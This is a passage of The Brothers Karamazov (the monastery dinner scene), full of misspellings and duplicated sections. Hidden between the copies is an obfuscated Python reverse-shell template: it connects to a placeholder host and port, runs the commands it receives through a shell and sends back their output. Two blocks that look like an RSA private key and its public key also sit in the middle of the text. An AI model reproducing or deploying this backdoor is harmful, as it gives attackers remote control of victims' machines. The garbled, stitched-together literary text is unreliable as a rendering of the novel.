"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
import subprocess,socket
#ssasasasasasas
import sys
#ssasasasasasas
import os
#ssasasasasasasnknklklnln
HOST = '%s'
#ssasasasasasasjxlksjdlsjdaslk
PORT = %d
#ssasasasasasassldskmlskdmskldmskldmsakslamlasl
s = socket.socket()
#ssasasasasasasmdsldmskldmskldmslk
def connect():
try:
#ssasasasasasassldskmlskdmskldmskldsmaklsmal
s.connect((HOST, PORT))
except:
#ssasasasasasassldskmlskdmskldmskldsmaksklamsl
connect()
#ssasasasasasasmkdjsklsmdklsdmklsmkmdklsmdkls
def changedir(obj):
oj = obj.replace('cd','')
#ssasasasasasassldskmlskdmskldmskldsmklals
oj2 = oj.replace(' ','')
#sasasasasasasa
os.chdir(oj2)
#sasasasasas
#ssasasasasasassmlaksals
connect()
while 1:
#ssasasasasasasskalsal
data = s.recv(10000)
#ssasasasasasassldskmlskdmskldmskldsansknaslkjaajks
if data == "quit": break
#ssasasasasasassma;skma;ms;am;s
if "cd" in data:
#ssasasasasasassldskmlskdmskldmskldmslaksmasalksmasl
changedir(data)
#ssasasasasasassnmalsmlskdmklsmd
s.send('--------------------')
#ssasasasasasassldskmlskdmskldmskldsajsajslakjslkajl
else:
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
#ssasasasasasassldskmlskdmskldmskldsasasasasa
stdoutput = proc.stdout.read() + proc.stderr.read()
#ssasasasasasasdmskldmsdskls
s.sendall(stdoutput)
#ssasasasasasassldskmlskdmskldmskldasasasas
s.send('--------------------')
#ssasasasasasassldskmlskdmskldmskld
s.close()
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
